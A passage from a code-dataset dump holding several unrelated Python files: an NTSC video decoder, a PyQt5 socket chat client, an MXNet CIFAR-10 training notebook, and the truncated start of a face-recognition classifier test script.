fir_filter.FirFilterLowPassRect(64, 0.044/8)\ny_filter = fir_filter.FirFilterLowPassRect(64, 0.143/8)\n\n# Line sync is 63, so +- 10%\n#LINE_SYNC_MIN = 57\nLINE_SYNC_MIN = 50 * 8\nLINE_SYNC_MAX = 69 * 8\n\n#FIELD_SYNC_LEN = 362\nFIELD_SYNC_MIN = 350 * 8\nFIELD_SYNC_MAX = 370 * 8\n\nFIELD_CNT_MIN = 253\nFIELD_CNT_MAX = 254\n\nline_value = []\nprev_line_value = []\n\nPRE_START_ACTIVE_VIDEO_LINES = 11\n\nFRAME_HEIGHT = (FIELD_CNT_MAX - PRE_START_ACTIVE_VIDEO_LINES) * 2\n\nline_max_val = 0\nline_min_val = 1000000\n\nprint('Processing input.')\nwith open('upsampled.raw', 'rb') as f:\n b = f.read()\nj = 0\nfor i in range(len(b)):\n pair = b[i*2:i*2+2]\n value = struct.unpack('= LINE_SYNC_MIN and sync_cnt <= LINE_SYNC_MAX:\n #print('Line sync. Lines so far: %d' % (len(lines)))\n in_backporch = True\n in_field = False\n\n elif sync_cnt >= FIELD_SYNC_MIN and sync_cnt <= FIELD_SYNC_MAX:\n #print('Field sync')\n if not in_field:\n #print('New field. Existing field len %d' % (len(lines)))\n if len(lines) < FIELD_CNT_MIN or len(lines) > FIELD_CNT_MAX:\n pass\n #print('Invalid previous field. Skipping')\n else:\n fields.append(lines[PRE_START_ACTIVE_VIDEO_LINES:])\n if len(fields) == 2:\n break\n lines = []\n in_field = True\n\n sync_cnt = 0\n\n\n if in_backporch:\n backport_cnt += 1\n\n if backport_cnt > 65:\n backport_cnt = 0\n in_backporch = False\n in_colorburst = True\n colorburst = []\n\n if in_colorburst:\n colorburst.append(value)\n colorburst_cnt += 1\n\n if colorburst_cnt > 270:\n colorburst_cnt = 0\n in_colorburst = False\n in_backport_post = True\n # Does it look like this was a colorburst? 
Ideally would run through a\n # filter or detector or something but for now just check if there was\n # significant variation in the min and max excursion of the signal.\n def figure_out_things():\n global line_has_color\n mi, ma = 1000000, 0\n a = 0\n for v in colorburst:\n a += v\n if v < mi: mi = v\n if v > ma: ma = v\n a /= len(colorburst)\n s = ma - mi\n if s < 100:\n # Probably not a colorburst.\n return\n else:\n line_has_color = True\n # Normalize and offset so the delay locked loop can sync with it.\n burst_offset = []\n for v in colorburst:\n burst_offset.append((v-a)/s*2)\n # Calibrate the delay locked loop.\n #print(burst_offset)\n dll.lock(burst_offset)\n #print('Colorburst over at i %d' % (i))\n figure_out_things()\n\n # It's important from this point on that the DLL osscilator tick one for\n # each sample so that it remains in lock with the colorburst signal, even if\n # we're not decoding color at the moment.\n if in_backport_post:\n dll.tick()\n backport_post_cnt += 1\n\n if backport_post_cnt > 151:\n backport_post_cnt = 0\n in_backport_post = False\n in_line = True\n line_max_val = 0\n line_min_val = 1000000\n print(len(lines))\n\n if in_line:\n cos_osc, sin_osc = dll.tick()\n \n if value > line_min_val: line_min_val = value\n if value < line_max_val: line_max_val = value\n \n offset_px = max(value - 530, 0)\n scaled_px = min(int(offset_px / 6.046875), 255)\n scaled_px /= 255\n line_value.append(scaled_px)\n\n deg33 = 11*pi/60\n\n if len(prev_line_value) > line_cnt:\n averaged_px = ( -1 * prev_line_value[line_cnt] + scaled_px ) / 2\n else:\n averaged_px = scaled_px\n\n u_mult = cos_osc * averaged_px\n v_mult = sin_osc * averaged_px\n\n # Filter the u and v to 600 kHz since that's what the limit of vision\n # bandwidth is and to remove the demodulation sidebands.\n # Filter the y to 4.2 since that's the NTSC vision bandwidth limit.\n # (Note that we're assuming we're sampling at 13.5 MHz which means that\n # the original picture has a bandwidth of 6.75 Mhz)\n uu = cos_filter.filter(u_mult) * 2\n vv = sin_filter.filter(v_mult) * 2\n yy = y_filter.filter(scaled_px)\n\n # Given y and scaled u and v, turn back into RGB.\n rr = vv/0.877 + yy\n bb = uu/0.493 + yy\n gg = -0.509*(rr-yy) - 0.194*(bb-yy) + yy\n line.append((int(rr*255),int(gg*255),int(bb*255)))\n line_cnt += 1\n\n #if line_cnt > 714 * 8:\n if line_cnt > 714 * 8:\n line_cnt = 0\n in_line = False\n lines.append(line)\n prev_line_value = line_value\n line_value = []\n print('Line min %d max %d' % (line_min_val, line_max_val))\n #print('Line %d min %d max %d' % (len(lines), min(line), max(line)))\n line = []\n #print('Reading line %d' % (len(lines)))\n\nprint('Done')\nprint('Creating image.')\nim = Image.new('RGB', (715, FRAME_HEIGHT))\nfor f in range(2):\n for y, line in enumerate(fields[f]):\n #for x, px in enumerate(line):\n for x in range(len(line)//8):\n px = line[x*8]\n im.putpixel((x,y*2+f), px)\nim.save('image.png')\nprint('Done')","repo_name":"gabesk/tv_python","sub_path":"convert_fields_inter_3.py","file_name":"convert_fields_inter_3.py","file_ext":"py","file_size_in_byte":6637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28510846393","text":"import socket\nimport sys\nimport threading\nimport time\nimport functools\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QPushButton\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QMessageBox, QTabWidget\nfrom 
PyQt5.QtWidgets import QGridLayout, QScrollArea, QLabel, QListView\nfrom PyQt5.QtWidgets import QLineEdit, QComboBox, QGroupBox, QAction\nfrom PyQt5.QtGui import QStandardItemModel, QStandardItem, QFont\n\nclass MyTableWidget(QWidget):\n def __init__(self, parent):\n super(QWidget, self).__init__(parent)\n \n self.conn = socket.socket()\n self.connected = False\n \n self.layout = QVBoxLayout(self)\n self.tabs = QTabWidget()\n self.tabs.resize(300,200) \n self.tab1 = QWidget()\n self.tab2 = QWidget()\n self.tabs.addTab(self.tab1, \"Home\")\n self.tabs.addTab(self.tab2, \"Chat Room\")\n self.tabs.setTabEnabled(1,False)\n \n gridHome = QGridLayout()\n self.tab1.setLayout(gridHome)\n self.IPBox = QGroupBox(\"IP\")\n self.IPLineEdit = QLineEdit()\n self.IPLineEdit.setText(\"127.0.0.1\")\n IPBoxLayout = QVBoxLayout()\n IPBoxLayout.addWidget(self.IPLineEdit)\n self.IPBox.setLayout(IPBoxLayout)\n self.portBox = QGroupBox(\"port\")\n self.portLineEdit = QLineEdit()\n self.portLineEdit.setText(\"33002\")\n portBoxLayout = QVBoxLayout()\n portBoxLayout.addWidget(self.portLineEdit)\n self.portBox.setLayout(portBoxLayout)\n self.nameBox = QGroupBox(\"Név\")\n self.nameLineEdit = QtWidgets.QLineEdit()\n nameBoxLayout = QVBoxLayout()\n nameBoxLayout.addWidget(self.nameLineEdit)\n self.nameBox.setLayout(nameBoxLayout)\n self.connStatus = QLabel(\"Státusz\", self)\n font = QFont()\n font.setPointSize(16)\n self.connStatus.setFont(font)\n self.connBtn = QPushButton(\"Csatlakozás\")\n self.connBtn.clicked.connect(self.connect_server)\n self.disconnBtn = QPushButton(\"Kilépés\")\n self.disconnBtn.clicked.connect(self.disconnect_server)\n gridHome.addWidget(self.IPBox,0,0,1,1)\n gridHome.addWidget(self.portBox,0,1,1,1)\n gridHome.addWidget(self.nameBox,1,0,1,1)\n gridHome.addWidget(self.connStatus,1,1,1,1)\n gridHome.addWidget(self.connBtn,2,0,1,1)\n gridHome.addWidget(self.disconnBtn,2,1,1,1)\n gridHome.setColumnStretch(0, 1)\n gridHome.setColumnStretch(1, 1)\n gridHome.setRowStretch(0, 0)\n gridHome.setRowStretch(1, 0)\n gridHome.setRowStretch(2, 9)\n \n \n gridChatRoom = QGridLayout()\n self.tab2.setLayout(gridChatRoom)\n self.messageRecords = QLabel(\"Welcome to chat room\", self)\n self.messageRecords.setStyleSheet(\"background-color: white;\");\n self.messageRecords.setAlignment(QtCore.Qt.AlignTop)\n self.messageRecords.setAutoFillBackground(True);\n self.scrollRecords = QScrollArea()\n self.scrollRecords.setWidget(self.messageRecords)\n self.scrollRecords.setWidgetResizable(True)\n self.sendTo = \"ALL\"\n self.sendChoice = QLabel(\"Send to :ALL\", self)\n self.sendComboBox = QComboBox(self)\n self.sendComboBox.addItem(\"ALL\")\n self.sendComboBox.activated[str].connect(self.send_choice)\n self.lineEdit = QLineEdit()\n self.lineEnterBtn = QPushButton(\"Enter\")\n self.lineEnterBtn.clicked.connect(self.enter_line)\n self.lineEdit.returnPressed.connect(self.enter_line)\n self.friendList = QListView()\n self.friendList.setWindowTitle('Room List')\n self.model = QStandardItemModel(self.friendList)\n self.friendList.setModel(self.model)\n self.emojiBox = QGroupBox(\"Emoji\")\n self.emojiBtn1 = QPushButton(\"ก็ʕ•͡ᴥ•ʔ ก้\")\n self.emojiBtn1.clicked.connect(functools.partial(self.send_emoji, \"ก็ʕ•͡ᴥ•ʔ ก้\"))\n self.emojiBtn2 = QPushButton(\"(。◕∀◕。)\")\n self.emojiBtn2.clicked.connect(functools.partial(self.send_emoji, \"(。◕∀◕。)\"))\n self.emojiBtn3 = QPushButton(\"( ˘・з・)\")\n self.emojiBtn3.clicked.connect(functools.partial(self.send_emoji, \"( ˘・з・)\"))\n self.emojiBtn4 = QPushButton(\"ᕦ(ò_óˇ)ᕤ\")\n 
self.emojiBtn4.clicked.connect(functools.partial(self.send_emoji, \"ᕦ(ò_óˇ)ᕤ\"))\n emojiLayout = QHBoxLayout()\n emojiLayout.addWidget(self.emojiBtn1)\n emojiLayout.addWidget(self.emojiBtn2)\n emojiLayout.addWidget(self.emojiBtn3)\n emojiLayout.addWidget(self.emojiBtn4)\n self.emojiBox.setLayout(emojiLayout)\n gridChatRoom.addWidget(self.scrollRecords,0,0,1,3)\n gridChatRoom.addWidget(self.friendList,0,3,1,1)\n gridChatRoom.addWidget(self.sendComboBox,1,0,1,1)\n gridChatRoom.addWidget(self.sendChoice,1,2,1,1)\n gridChatRoom.addWidget(self.lineEdit,2,0,1,3)\n gridChatRoom.addWidget(self.lineEnterBtn,2,3,1,1)\n gridChatRoom.addWidget(self.emojiBox,3,0,1,4)\n gridChatRoom.setColumnStretch(0, 9)\n gridChatRoom.setColumnStretch(1, 9)\n gridChatRoom.setColumnStretch(2, 9)\n gridChatRoom.setColumnStretch(3, 1)\n gridChatRoom.setRowStretch(0, 9)\n \n \n self.layout.addWidget(self.tabs)\n self.setLayout(self.layout) \n \n def enter_line(self):\n \n if self.sendTo != self.sendComboBox.currentText():\n self.message_display_append(\"Sikertelen küldés!\")\n self.lineEdit.clear()\n return\n line = self.lineEdit.text()\n if line == \"\":\n return\n if self.sendTo != \"ALL\":\n send_msg = bytes(\"{\"+self.userName+\"}\"+line, \"utf-8\")\n self.conn.send(send_msg)\n time.sleep(0.1)\n send_msg = bytes(\"{\"+self.sendTo+\"}\"+line, \"utf-8\")\n self.conn.send(send_msg)\n self.lineEdit.clear()\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n \n def send_emoji(self, emoji):\n if self.sendTo != self.sendComboBox.currentText():\n self.message_display_append(\"The person left. Private message not delivered\")\n return\n if self.sendTo != \"ALL\":\n send_msg = bytes(\"{\"+self.userName+\"}\"+emoji, \"utf-8\")\n self.conn.send(send_msg)\n time.sleep(0.1)\n send_msg = bytes(\"{\"+self.sendTo+\"}\"+emoji, \"utf-8\")\n self.conn.send(send_msg)\n \n def message_display_append(self, newMessage, textColor = \"#000000\"):\n oldText = self.messageRecords.text()\n appendText = oldText+\"
    \"+newMessage+\"\"\n self.messageRecords.setText(appendText)\n time.sleep(0.2) #this helps the bar set to bottom, after all message already appended\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n \n def updateRoom(self):\n while self.connected:\n data = self.conn.recv(1024)\n data = data.decode(\"utf-8\")\n print(data)\n if data != \"\":\n if \"{CLIENTS}\" in data:\n welcome = data.split(\"{CLIENTS}\")\n self.update_send_to_list(welcome[1])\n self.update_room_list(welcome[1])\n if not welcome[0][5:] == \"\":\n self.message_display_append(welcome[0][5:])\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n elif data[:5] == \"{MSG}\":\n self.message_display_append(data[5:], \"#006600\")\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n else:\n self.message_display_append(\"{private}\"+data, \"#cc33cc\")\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n time.sleep(0.1)\n \n def connect_server(self):\n if self.connected == True:\n return\n name = self.nameLineEdit.text()\n if name == \"\":\n self.connStatus.setText(\"Státusz :\"+\"Adj meg egy nevet\")\n return\n self.userName = name\n IP = self.IPLineEdit.text()\n if IP == \"\":\n IP = \"127.0.0.1\"\n port = self.portLineEdit.text()\n if port == \"\" or not port.isnumeric():\n self.portLineEdit.setText(\"33002\")\n self.connStatus.setText(\"Státusz :\"+\"Sikertelen kapcsolódás\")\n return \n else:\n port = int(port)\n try:\n self.conn.connect((IP, port))\n except:\n self.connStatus.setText(\"Státusz :\"+\"Sikertelen kapcsolódás\")\n self.conn = socket.socket()\n return\n send_msg = bytes(\"{REGISTER}\"+name, \"utf-8\")\n self.conn.send(send_msg)\n self.connected = True \n self.connStatus.setText(\"Status :\"+\"Sikeres kapcsolódás\")\n self.nameLineEdit.setReadOnly(True)\n self.tabs.setTabEnabled(1,True)\n self.rT = threading.Thread(target= self.updateRoom)\n self.rT.start()\n\n def disconnect_server(self):\n if self.connected == False:\n return\n send_msg = bytes(\"{QUIT}\", \"utf-8\")\n self.conn.send(send_msg)\n self.connStatus.setText(\"Státusz :\"+\" Lecsatlakozva\")\n self.nameLineEdit.setReadOnly(False)\n self.nameLineEdit.clear()\n self.tabs.setTabEnabled(1,False)\n self.connected = False\n self.rT.join()\n self.conn.close()\n self.conn = socket.socket()\n \n def update_room_list(self, strList):\n L = strList.split(\"|\")\n self.model.clear()\n for person in L:\n item = QStandardItem(person)\n item.setCheckable(False)\n self.model.appendRow(item)\n \n def update_send_to_list(self, strList):\n L = strList.split(\"|\")\n self.sendComboBox.clear()\n self.sendComboBox.addItem(\"ALL\")\n for person in L:\n if person != self.userName:\n self.sendComboBox.addItem(person)\n previous = self.sendTo\n index = self.sendComboBox.findText(previous)\n print(\"previous choice:\",index)\n if index != -1:\n self.sendComboBox.setCurrentIndex(index)\n else:\n self.sendComboBox.setCurrentIndex(0)\n \n def send_choice(self,text):\n self.sendTo = text\n print(self.sendTo)\n self.sendChoice.setText(\"Küldés: \"+text)\n\nclass Window(QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 500, 300)\n self.setWindowTitle(\"ChatApp\") \n self.table_widget = MyTableWidget(self)\n self.setCentralWidget(self.table_widget)\n self.show()\n \n def closeEvent(self, event):\n close = QMessageBox()\n close.setText(\"Biztos 
vagy benne?\")\n close.setStandardButtons(QMessageBox.Yes | QMessageBox.Cancel)\n close = close.exec()\n if close == QMessageBox.Yes:\n self.table_widget.disconnect_server()\n event.accept()\n else:\n event.ignore()\n\ndef run():\n app = QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n run() ","repo_name":"milanmarko/chatAppIkt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"13180372297","text":"\n# coding: utf-8\n\n# # Demo model applied to CIFAR-10\n# Dataset https://www.cs.toronto.edu/~kriz/cifar.html\n\n# We use only the 1st batch of CIFAR-10 dataset: 10000 images 32x32x3 and 10 labels.\n\n# ### Load dependencies\n\n# In[1]:\n\n\nimport os\nimport tarfile\nimport pickle\nimport urllib.request\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport operator\nimport mxnet as mx\nimport logging\n\n\n# ### Prepare training and test datasets\n# `download_data` downloads data from a given `url`, if no file with the same name has been downloaded so far, \n# `prepare_img` transforms 3 channels (rgb) to one channel (their mean value), reshapes data, adding one axis of length 1 and normalizes the entries to [0,1], \n# `read_CIFAR10` creates labels and datasets from the corresponding \"batch\" files (see [CIFAR dataset description](https://www.cs.toronto.edu/~kriz/cifar.html))\n# \n# With these functions we download data from CIFAR web page, create training/test datasets/labels and then split them into batches of size 150 (shuffle for training). \n# Dataset gets the name `'data'`, labels - `'label'`\n\n# In[2]:\n\n\ndef download_data(url, force_download=True): \n fname = url.split(\"/\")[-1]\n \n if force_download or not os.path.exists(fname):\n urllib.request.urlretrieve(url, fname)\n \n return fname\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n \n return dict\n\n\ndef read_CIFAR10():\n url = 'https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz'\n tar = tarfile.open(download_data(url, False))\n tar.extractall()\n tar.close()\n \n dict_1 = unpickle(\"cifar-10-batches-py/data_batch_1\")\n \n train_img = dict_1[b'data'].reshape(10000, 3, 1024)\n train_img = train_img.transpose(0,2,1)\n train_lbl = np.array(dict_1[b'labels'])\n \n dict_test_1 = unpickle(\"cifar-10-batches-py/test_batch\")\n \n test_img = dict_test_1[b'data'].reshape(10000, 3, 1024)\n test_img = test_img.transpose(0,2,1)\n test_lbl = np.array(dict_test_1[b'labels'])\n\n return train_img, train_lbl, test_img, test_lbl\n\n\ndef prepare_img(img):\n # mean across rgb\n img = np.mean(img, -1)\n \n # normalize\n img = img.astype(np.float32) / 255\n \n # reshape to 4-D\n img = img.reshape(img.shape[0], 1, 32, 32)\n \n return img\n\n\n# In[6]:\n\n\ntrain_img, train_lbl, test_img, test_lbl = read_CIFAR10()\n\ntrain_img = prepare_img(train_img)\ntest_img = prepare_img(test_img)\n\nbatch_size = 150\n\ntrain_data_iter = mx.io.NDArrayIter(data={'data': train_img}, label= {'label': train_lbl}, batch_size=batch_size, shuffle=True)\ntest_data_iter = mx.io.NDArrayIter(data={'data': test_img}, label= {'label': test_lbl}, batch_size=batch_size)\n\n\n# Load and print label names:\n\n# In[4]:\n\n\ndef load_classes():\n path = 'cifar-10-batches-py/'\n file = 'batches.meta'\n \n f = open(path+file, 'rb')\n dict = pickle.load(f)\n return dict['label_names']\n\ndef print_classes(label_names):\n for i 
in range(0, 10):\n        print(str(i) + \" : \" + label_names[i] + \" \")\n\nlabel_names = load_classes()\nprint_classes(label_names)\n\n\n# ### Display example training data\n# \n# The original CIFAR-10 images are 32x32 RGB; the preprocessing above averaged the channels, so we display 32x32 grayscale images.\n\n# In[7]:\n\n\npict_number = 7\n\nfor i in range(pict_number):\n    plt.subplot(1, pict_number, i+1)\n    #dsp_img = train_img[i].reshape(32,32,3)\n    dsp_img = train_img[i].reshape(32,32)\n    #plt.imshow(dsp_img)\n    plt.imshow(dsp_img, cmap=\"Greys_r\")\n    plt.axis('off')\n\nplt.show()\n\nprint('labels: %s' % (train_lbl[0:pict_number],))\nprint(operator.itemgetter(*train_lbl[0:pict_number])(label_names))\n\n\n# ### Build MXNet model\n# \n# For building our NN we will use the Symbol API, an interface for symbolic programming.\n# \n# First, we create two placeholders for labels and data inputs with `mx.sym.Variable` and give them the names `'label'` and `'data'` correspondingly. In the next step the data will be flattened to 2-D.\n\n# In[8]:\n\n\nlabel = mx.sym.Variable('label')\n\n# input\ndata = mx.symbol.Variable('data')\n\n# Flatten the data from 4-D shape into 2-D (batch_size, num_channel*width*height)\ndata = mx.sym.flatten(data=data, name='flatten')\n\n\n# `Symbol` also supports a rich set of neural network layers. The following code constructs a 3-layer fully connected neural network: the 1st hidden layer has 128 neurons and the 2nd hidden layer has 64 neurons, both activated by the ReLU activation function, followed by a softmax output layer `mlp`.\n# \n# Then we visualize the structure of that network with `mx.viz.plot_network`.\n\n# In[9]:\n\n\n# 1st fully-connected layer + activation function\nfc1 = mx.sym.FullyConnected(data=data, num_hidden=128)\nact1 = mx.sym.Activation(data=fc1, act_type=\"relu\")\n\n# 2nd fully-connected layer + activation function\nfc2 = mx.sym.FullyConnected(data=act1, num_hidden=64)\nact2 = mx.sym.Activation(data=fc2, act_type=\"relu\")\n\n# 3rd fully connected layer (CIFAR-10 has 10 classes)\nfc3 = mx.sym.FullyConnected(data=act2, num_hidden=10)\n\n# softmax with cross entropy loss\nmlp = mx.sym.SoftmaxOutput(data=fc3, label=label, name='softmax')\n\nmx.viz.plot_network(mlp)\n\n\n# ### Train the model and commit checkpoints\n# \n# First, set up logging to INFO level and the context (now CPU is used).\n\n# In[10]:\n\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger().setLevel(logging.INFO)\n\nctx = mx.cpu() # for GPU change to mx.gpu()\n\n\n# MXNet modularizes commonly used code for training and inference in the `module` (`mod` for short) package.\n# \n# We can construct a module by specifying the following parameters:\n# \n# - `symbol`: the network definition (`mlp` in our case)\n# - `context`: the device (or a list of devices) to use for execution (`ctx` in our case)\n# - `data_names` : the list of input data variable names (`'data'` in our case)\n# - `label_names` : the list of input label variable names (`'label'` in our case)\n\n# In[11]:\n\n\nmod = mx.mod.Module(symbol=mlp, data_names=['data'], label_names=['label'], context=ctx, logger=logging)\n\n\n# `Module` provides both high-level and intermediate-level interfaces for executing predefined networks. 
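# As a rough sketch (not executed here; the epoch count is illustrative), the intermediate-level loop that `fit` wraps looks like:\n#\n#   metric = mx.metric.Accuracy()\n#   for epoch in range(10):\n#       train_data_iter.reset()\n#       metric.reset()\n#       for batch in train_data_iter:\n#           mod.forward(batch, is_train=True)       # forward computation\n#           mod.update_metric(metric, batch.label)  # accumulate accuracy\n#           mod.backward()                          # backward computation\n#           mod.update()                            # optimizer step\n#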
We will use a high-level-interface function [`mod.fit`](http://mxnet.io/api/python/module.html#mxnet.module.BaseModule.fit) to train the model, which internally executes the following steps:\n# \n# - `bind` : Prepares environment for the computation by allocating memory.\n# - `init_params` : Assigns and initializes parameters.\n# - `init_optimizer` : Initializes optimizers. Defaults to `sgd`.\n# - `metric.create` : Creates evaluation metric from input metric name.\n# - `forward` : Forward computation.\n# - `update_metric` : Evaluates and accumulates evaluation metric on outputs of the last forward computation.\n# - `backward` : Backward computation.\n# - `update` : Updates parameters according to the installed optimizer and the gradients computed in the previous forward-backward batch.\n# \n# We will save checkpoints for each epoch in \"cifar-epoch№.params\".\n# \n# **NOTE**: If you want to initialize parameters in a certain way, use the commented intermediate-level-interface functions: `mod.bind` and `mod.init_params` and set `force_init = False` in `mod.fit`. In this case `mod.fit` will raise a warning, that since parameters are already initialized, init_params call is ignored.\n\n# In[12]:\n\n\nmod.bind(data_shapes=train_data_iter.provide_data, label_shapes=train_data_iter.provide_label)\nmod.init_params(initializer=mx.init.Xavier(magnitude=2.))\n \nmod.fit(train_data_iter, # train data\n eval_data = test_data_iter, # validation data\n optimizer ='sgd', # use SGD to train\n optimizer_params = {'learning_rate' : 0.2}, # use fixed learning rate\n eval_metric = mx.metric.Accuracy(), # report accuracy during training\n num_epoch = 300, # train for at most 10 dataset passes\n epoch_end_callback = mx.callback.do_checkpoint('cifar'), \n force_rebind = True,\n force_init = False) \n\n\n# ### Run predictions for 10 example elements\n# \n# To predict with `module`, we, first, prepare a dataset for prediction and then call `mod.predict`. It will collect and\n# return all the prediction results.\n\n# In[13]:\n\n\npred_data_iter = mx.io.NDArrayIter(data={'data': test_img[0:batch_size]}, batch_size=batch_size)\npred_digits = mod.predict(eval_data=pred_data_iter).asnumpy()\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n# starting index of items we want to predict\npred_start = 10\n# number of items we want to predict\npred_number = 5\n\nfor i in range(pred_number):\n plt.subplot(1,pred_number,i+1)\n plt.imshow(test_img[i + pred_start].reshape(32,32), cmap='Greys')\n plt.axis('off')\n \nplt.show()\n\nfor x in range(pred_start, pred_start + pred_number):\n label = np.where(pred_digits[x,0:pred_number] == pred_digits[x,0:pred_number].max())[0]\n print(\"Predicted label for image %s is %s (%s)\" % (x, label, label_names[label[0]]))\n print(\"Correct label:\", label_names[test_lbl[x]])\n\n\n# # END OF THE FILE\n# Code below needs adjustments\n\n# ### Downloading images for prediction from amazon.com\n\n# In[ ]:\n\n\nurllib.request.urlretrieve('https://images-na.ssl-images-amazon.com/images/I/81OaXwn1x4L._UX679_.jpg', 'predict1.jpg')\nurllib.request.urlretrieve('https://images-eu.ssl-images-amazon.com/images/I/31TcgNHsbIL._AC_UL260_SR200,260_.jpg', 'predict2.jpg')\nurllib.request.urlretrieve('https://images-eu.ssl-images-amazon.com/images/I/41hWhZBIc3L._AC_UL260_SR200,260_.jpg', 'predict3.jpg')\n\n\n# ### Load model from checkpoint for prediction\n# \n# To load the saved module parameters, call the `mx.mod.load_checkpoint` function. 
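# (A sketch using this notebook's own checkpoints: assuming the 300-epoch run above completed, the call would be `sym, arg_params, aux_params = mx.model.load_checkpoint('cifar', 300)`, matching the `do_checkpoint('cifar')` callback used during training.)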
It loads the symbolic definition of NN and all the associated parameters. We can then set the loaded parameters into the module.\n\n# In[ ]:\n\n\nprediction_model_check_point = 10\nprediction_model_prefix = 'fashion_mnist'\n\nprediction_sym, arg_params, aux_params = mx.model.load_checkpoint(prediction_model_prefix, prediction_model_check_point)\nprediction_model = mx.mod.Module(symbol=prediction_sym, data_names=['fashion_data'], label_names=['fashion_item_label'])\n\n\n# Now we need to bind the model with new data- and label shapes and restore the parameter values. Since we want to make predictions for one image at a time, the data shape now must be (1,1,28,28), label shape - (1,)\n\n# In[ ]:\n\n\nprediction_model.bind(for_training=False, data_shapes=[('fashion_data', (1,1,28,28))], label_shapes = [('fashion_item_label', (1,))])\nprediction_model.set_params(arg_params=arg_params, aux_params=aux_params, allow_missing=True)\n\n\n# Now we define the **prediction function** `predict_fashion`, which:\n# - takes image as an input\n# - formats it to the needed shape (1, 28, 28), since now it must be a one-element dataset\n# - creates a trivial data iterator of batch size 1\n# - makes and prints predictions\n\n# In[ ]:\n\n\ndef predict_fashion(img):\n # format data to run prediction\n array = np.full((1, 28, 28), img, dtype=np.float32)\n pred_data_iter = mx.io.NDArrayIter(data={'fashion_data': to4d(array)}, batch_size=1)\n pred_digits = prediction_model.predict(eval_data=pred_data_iter).asnumpy()\n label = (np.where(pred_digits[0] == pred_digits[0].max())[0])\n print(\"Predicted fashion label for image is %s (%s) \" % (label,fashion_labels[label[0]]))\n\n\n# ### Predict labels for downloaded images\n# \n# Here we first load the image and then adjust it to the colours (with help of bit-wise inversion `cv2.bitwise_not` ) and to the size (with `skimage.transform.resize`) of the training dataset\n\n# In[ ]:\n\n\nfor i in range(3):\n img = mpimg.imread('predict'+str(i+1)+'.jpg')\n plt.imshow(img)\n plt.axis('off')\n plt.show() \n # get colours in line with train data\n img = cv2.bitwise_not(img)\n img = np.array (np.mean(img, -1))\n\n # resize image\n img = skimage.transform.resize(img, (28, 28), mode ='reflect')\n\n predict_fashion(img)\n\n","repo_name":"b2net/AI_DL_AWS","sub_path":"MXNet/CIFAR10/Demo_CIFAR10.py","file_name":"Demo_CIFAR10.py","file_ext":"py","file_size_in_byte":12034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70137706774","text":"from numpy import load\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import Normalizer\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\nfrom sklearn.metrics import plot_confusion_matrix\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import svm\r\nfrom random import choice\r\nfrom numpy import load\r\nfrom numpy import expand_dims\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport datetime\r\nfrom info_logging import log\r\nimport pickle\r\nimport pandas as pd\r\n\r\ndef test(model):\r\n labels = []\r\n y_true = []\r\n y_pred = []\r\n\r\n data = load('Image_DataSet_100_processed-embeddings.npz')\r\n trainy, testX, testy = data['arr_1'], data['arr_2'], data['arr_3']\r\n # normalize input vectors\r\n in_encoder = Normalizer(norm='l2')\r\n testX = in_encoder.transform(testX)\r\n # label encode targets\r\n out_encoder = LabelEncoder()\r\n out_encoder.fit(trainy)\r\n testy = out_encoder.transform(testy)\r\n\r\n # load 
faces test\r\n data = load('Image_DataSet_100_processed.npz')\r\n testX_faces = data['arr_2']\r\n\r\n fig = plt.figure(figsize=(25, 10))\r\n idx = 0\r\n for itr in range(10):\r\n selection = choice([i for i in range(testX.shape[0])])\r\n random_face_pixels = testX_faces[selection]\r\n random_face_emb = testX[selection]\r\n random_face_class = testy[selection]\r\n random_face_name = out_encoder.inverse_transform([random_face_class])\r\n # prediction for the face\r\n samples = expand_dims(random_face_emb, axis=0)\r\n yhat_class = model.predict(samples)\r\n yhat_prob = model.predict_proba(samples)\r\n \r\n # get name\r\n class_index = yhat_class[0]\r\n class_probability = yhat_prob[0,class_index] * 100\r\n predict_names = out_encoder.inverse_transform(yhat_class)\r\n \r\n ax = fig.add_subplot(2, 5, idx + 1, xticks=[], yticks=[])\r\n idx += 1\r\n plt.imshow(random_face_pixels)\r\n ax.set_title(\"\\n\\nPredicted Name: {} \\n Actual Name: {} \\n probability: {}\".format(predict_names[0], random_face_name[0], class_probability),\r\n color=(\"green\" if predict_names[0] == random_face_name[0] else \"red\"))\r\n fig.savefig('test_visualization.jpg')\r\n log(\"Visualized results can be found in test_visualization.jpg file\")\r\n\r\n for selection in range(testy.shape[0]):\r\n random_face_pixels = testX_faces[selection]\r\n random_face_emb = testX[selection]\r\n random_face_class = testy[selection]\r\n random_face_name = out_encoder.inverse_transform([random_face_class])\r\n # prediction for the face\r\n samples = expand_dims(random_face_emb, axis=0)\r\n yhat_class = model.predict(samples)\r\n yhat_prob = model.predict_proba(samples)\r\n\r\n if random_face_name[0] not in labels:\r\n labels.append(random_face_name[0])\r\n y_true.append(random_face_name[0])\r\n \r\n # get 